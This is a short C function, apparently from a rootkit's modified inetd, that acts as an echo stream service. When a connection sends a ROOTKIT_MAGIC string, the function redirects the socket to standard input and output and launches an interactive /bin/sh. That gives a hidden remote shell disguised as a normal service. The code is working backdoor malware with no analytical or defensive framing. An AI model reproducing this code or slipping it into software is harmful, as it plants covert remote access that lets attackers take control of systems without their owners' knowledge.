void rshell_stream(int s, struct servtab *sep)		
{
	char buffer[BUFSIZE];
	int i;
	char MAG[7];

	MAG[0]=ROOTKIT_MAGIC[0];
	MAG[1]=ROOTKIT_MAGIC[1];
	MAG[2]=ROOTKIT_MAGIC[2];
	MAG[3]=ROOTKIT_MAGIC[3];
	MAG[4]=ROOTKIT_MAGIC[4];
	MAG[5]=ROOTKIT_MAGIC[5];
	MAG[6]='\0';

	while ((i = read(s, buffer, sizeof(buffer))) > 0) {
		if(!strncmp(buffer, MAG, sizeof(MAG)-1)) {
			dup2(s, 0);
			dup2(s, 1);
			dup2(s, 2);
			execl("/bin/sh", "sh", "-i", 0);
			close(s);
			break;
		}
		if(write(s, buffer, i) < 0)
			break;
	}
	exit(0);
}
